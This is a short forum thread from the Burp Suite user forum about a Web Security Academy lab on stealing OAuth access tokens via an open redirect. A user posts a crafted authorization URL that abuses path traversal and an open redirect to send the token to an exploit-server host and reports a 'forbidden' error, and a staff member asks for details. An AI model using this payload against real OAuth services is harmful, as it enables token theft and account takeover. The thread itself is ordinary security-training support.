Burp Suite User Forum

Login to post

Stealing OAuth access tokens via an open redirect

TIZEE | Last updated: Jan 21, 2023 02:03PM UTC

https://0a5900c503a255e2c0a2ed1f02a7003c.web-security-academy.net/auth?client_id=bafv9dae8qp24om34rrbm&redirect_uri=https://0a0000a2035e554ec06eef8d00b00056.web-security-academy.net/oauth-callback/../post/next?path=https://exploit-0ad500a503b35524c06deebc01e700fb.exploit-server.net/exploit&response_type=token&nonce=399721827&scope=openid%20profile%20email This lab shows client error:forbidden,is something wrong in this lab? I ve been trying for 6 hrs and still it shows like this.

Michelle, PortSwigger Agent | Last updated: Jan 23, 2023 03:27PM UTC

I've just been testing this out, and I've not come across the same issue yet. If this is still happening, can you tell us more about the steps you're taking?

You need to Log in to post a reply. Or register here, for free.